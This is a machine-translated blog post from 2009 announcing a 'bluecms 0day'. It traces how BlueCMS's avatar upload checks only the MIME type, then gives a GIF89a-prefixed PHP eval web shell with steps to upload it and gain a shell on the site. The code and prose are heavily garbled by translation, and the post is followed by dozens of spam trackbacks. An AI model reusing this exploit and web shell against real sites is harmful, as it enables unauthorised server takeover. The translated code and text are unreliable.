RSS

bluecms 0day

Ця запис була розміщена на 7 жовтня 2009

: St0p
Відтворюється вкажіть джерело: http://www.st0p.org

Примітка: На жаль, версія вранці волосся на ніч називається двоїстої до газети 0day, інформація і просто зайти на офіційний дивилися, і випустила оновлення для системи безпеки скоро .. а ви можете виходити в інтернет Не оновлена ​​версія тесту ...

На жаль, група мій друг зробив CMS, сказав даних користувача змінити деякі з них можуть бути введені, сказав, що аналіз, з локально встановленої після цього, не може використовувати одинарні лапки екрануються magic_quotes_gpc = OFF. . .

Дивіться include / common.inc.php лінії, здавайтеся. . 

 
 2
 3
 4
 5
 6
 7
 8
 9

  ......
  ! get_magic_quotes_gpc ( ) ) якщо (! get_magic_quotes_gpc ())
  {
 	 deep_addslashes ( $_POST ) ; $ _POST = Deep_addslashes ($ _POST);
 	 deep_addslashes ( $_GET ) ; $ _GET = Deep_addslashes ($ _GET);
 	 deep_addslashes ( $_COOKIES ) ; $ _COOKIES = Deep_addslashes ($ _COOKIES);
 	 deep_addslashes ( $_REQUEST ) ; = $ _REQUEST Deep_addslashes ($ _REQUEST);
  }
 ......

Можливо st0p удачі см. завантажувати фотографії деталей, аналіз коду, використовувати щось знайти в user.php. . 

 
 2
 3
 4
 5
 6

  BLUE_ROOT . 'include/upload.class.php' ) ; //调用上传类 require_once (BLUE_ROOT. 'include / upload.class.php'); / / викликаємо клас завантаження
     new upload ( ) ; $ Image = нові завантаження ();
	  isset ( $_FILES [ 'face_pic' ] [ 'error' ] ) && $_FILES [ 'face_pic' ] [ 'error' ] == 0 ) { якщо (Ісеть ($ _FILES ['face_pic'] ['помилка']) && $ _FILES ['face_pic'] ['помилка'] == 0) {
		 $image -> img_upload ( $_FILES [ 'face_pic' ] , 'face_pic' ) ; $ = $ Face_pic зображення -> img_upload ($ _FILES ['face_pic'], 'face_pic'); 
                          / / Не виявляти суфікс безпосередньо в клас зможуть пройти SHELL
	 }

Відкрийте вмикати / upload.class.php тільки для визначення заголовка файлу не виявляє суфікс 

 
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27

 upload { private $allow_image_type = array ( 'image/jpg' , 'image/gif' , 'image/png' , 'image/pjpeg' ) ; ...... function img_upload ( $file , $dir = '' , $imgname = '' ) { if ( empty ( $dir ) ) { $dir = BLUE_ROOT . DATA . UPLOAD . date ( "Ym" ) . "/" ; } else { $dir = BLUE_ROOT . DATA . UPLOAD . $dir . "/" ; } if ( ! file_exists ( $dir ) ) { if ( ! mkdir ( $dir ) ) { showmsg ( '上传过程中创建目录失败' ) ; } } if ( empty ( $imgname ) ) { $imgname = $this -> create_tempname ( ) . $this -> get_type ( $file [ 'name' ] ) ; } $imgname = $dir . $imgname ; if ( ! in_array ( $file [ 'type' ] , $this -> allow_image_type ) ) { //只是检测了文件头部来着,那我们就直接构造一个SHELL就好了 showmsg ( '不允许的图片类型' ) ; } } Клас ...... завантаження {приватних $ allow_image_type = Array ("зображення / JPG», «зображення / малюнок», «зображення / PNG», «зображення / pjpeg '); ...... функції img_upload ($ файл, каталог $ ='', $ imgname ='') {якщо (пусто ($ DIR)) {$ = BLUE_ROOT каталог завантаження даних дати ("ут") "/", ....} ще {$ = каталог BLUE_ROOT завантаження даних $ каталозі "/", ..} якщо (file_exists ($ DIR)) {якщо (MkDir ($ DIR)) {showmsg («Процес завантаження не вдалося створити каталог ');}}, якщо (пусто ($ imgname)) {$ imgname = $ це -> create_tempname () $ це -> get_type ($ файлу ['ім'я']);.} $ imgname = $ $ imgname каталог, якщо (in_array ($.! Файл ['типу'], $ це -> allow_image_type)) {/ / просто виявити файл заголовка, ми безпосередньо побудувати SHELL як showmsg зображення типу ("не допускається");}}

Вище для збереження st0p.php 

 
 2

  GIF89a
 ( $_POST [ st0p ] ) ; ?> <Php Eval ($ _POST [st0p]);?>

Примітка мережі логін, член -> мій профіль, а потім завантажити новий образ до виборів ми побудували PHP файлу, точка, щоб підтвердити зміну, перегляд адресу успішно, клацніть правою кнопкою миші на фотографії безпосередньо на лінії. . Слово SHELL успішно завантажений!

bluecms-0day1

bluecms-0day2

Аналіз завершений, я сподіваюся, що більше бірж, питання про ці речі просто хочу зустрітися з друзями, щоб обговорити технології, створені групи, а просто звичайна група, тільки 100 осіб, очистити, ніколи не говори був сильно завантажений В хаосі T, депресія, відкрита група для обміну, не говори був прототип на місці, хочуть прогресу, осторонь дороги не може тривати!
Якщо ви в групі тільки, щоб отримати результати обговорення інших від інших, не знаю, заплатити, або просто прийти дайвінгом або без. . .

, , ,
· Дізнатися, бойові мистецтва коди
Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag


79 Відповідей на "bluecms 0day"

  1. За хостинг на 17 листопада 2009 | Відповісти

    Ja, verjetno ЗАТЕ е


  1. 78 Trackback (и)

  2. 8 липня 2011: Керівництво для початківців олівець, малюнок
  3. 21 грудня 2011: Таксі Бостоні
  4. 24 грудня 2011: Садівники дюйма Крауч кінець N8
  5. 25 грудня 2011: Пейзаж садівників Лондоні
  6. 6 січня 2012: електронна книга
  7. 17 січня 2012: остаточні технології supercubeï ¿ ½ 6000
  8. 18 січня 2012: nutricion Deportiva
  9. 19 січня 2012: ватман, вилучення гільзи
  10. 19 січня 2012: Тіу 1
  11. 21 січня 2012: portarollo
  12. 24 січня 2012: antykwariaty
  13. 29 січня 2012: П »¿ Послуги Альфа-Гарантія,
  14. 29 січня 2012: Послуги Альфа-Гарантії
  15. 30 січня 2012: NBA прогнози
  16. 30 січня 2012: Manistee весільного фотографа
  17. 31 січня 2012: WOF Крайстчерч
  18. 31 січня 2012: безкоштовно порно відео на
  19. 31 січня 2012: сорочка бодібілдингу т
  20. 4 лютого 2012: NFL шанси
  21. 5 лютого 2012: Де ставити Super Bowl 46
  22. 6 лютого 2012: травми спини
  23. 6 лютого 2012: вільний Оголошення
  24. 7 лютого 2012: Георгіївська мануального терапевта
  25. 7 лютого 2012: ясновидців Великобританії
  26. 9 лютого 2012: спортивного ставки
  27. 9 лютого 2012: Phlebotomy техніка
  28. 10 лютого 2012: Mazda запчастини
  29. 12 лютого 2012: слюсар автомобіля в Порт-Річмонд, штат Нью-Йорк
  30. 13 лютого 2012: agustus
  31. 15 лютого 2012: trycholog Гдині
  32. 18 лютого 2012: купони заміни масла
  33. 19 лютого 2012: топ азіатська спортивного
  34. 22 лютого 2012: Дональд Бобик пірнути абонемент
  35. 22 лютого 2012: Окленд drainlayer
  36. 25 лютого 2012: психічний світ
  37. 26 лютого 2012: Elektrik
  38. 26 лютого 2012: фізична терапія помічник
  39. 1 березня 2012: туристи світу
  40. 3 березня 2012: екстрасенси
  41. 7 березня 2012: Абдель-Малик
  42. 8 березня 2012: будинки пг
  43. 8 березня 2012: гольф гойдалки допомогу
  44. 10 березня 2012: столярні вироби Окленд
  45. 12 березня 2012: психічних читань
  46. 13 березня 2012: кури ніч
  47. 14 березня 2012: Абубакар
  48. 18 березня 2012: Онлайн-ігри
  49. 19 березня 2012: Alisson
  50. 23 березня 2012: NBA Picks
  51. 23 березня 2012: вільний психічної чаті
  52. 24 березня 2012: безпека двері пг
  53. 27 березня 2012: походи магазинів
  54. 29 березня 2012: будинки відпочинку дюйма Окленд
  55. 30 березня 2012: геодезистів Окленд
  56. 31 березня 2012: інтернет рибу в магазині
  57. 3 квітня 2012: Ares, скачати безкоштовно
  58. 7 квітня 2012: Szkoła jazdy Гдиня opinie
  59. 10 квітня 2012: antykwariaty
  60. 18 квітня 2012: Жалюзі
  61. 18 квітня 2012: Безкоштовно б'є Dre
  62. 20 квітня 2012: Фіджі пакети
  63. 22 квітня 2012: Сайт маркетингу
  64. 22 квітня 2012: Treehouses
  65. 22 квітня 2012: Динамічний ізоляції
  66. 22 квітня 2012: в тату
  67. 22 квітня 2012: Рейтинг SEO послуги,
  68. 22 квітня 2012: Управління ланцюжками поставок для гольфу,
  69. 22 квітня 2012: ЦРУ Test Prep
  70. 24 квітня 2012: вікна Окленд
  71. 24 квітня 2012: Chanel, ГОДИННИК
  72. 3 травня 2012: котирування страхування автомобіля
  73. 6 травня 2012: сонячне
  74. 6 травня 2012: оцінка бізнесу
  75. 13 травня 2012: assentient навпаки bestamp до
  76. 17 травня 2012: сумки Gucci Outlet
  77. 18 травня 2012: Grecja niepodległa.
  78. 18 травня 2012: . Наполеона I jego marszałkowie Наполеона та ін сесію marechaux
  79. 19 травня 2012: Натисніть тут!

Ви повинні бути зареєстровані , щоб залишити коментар.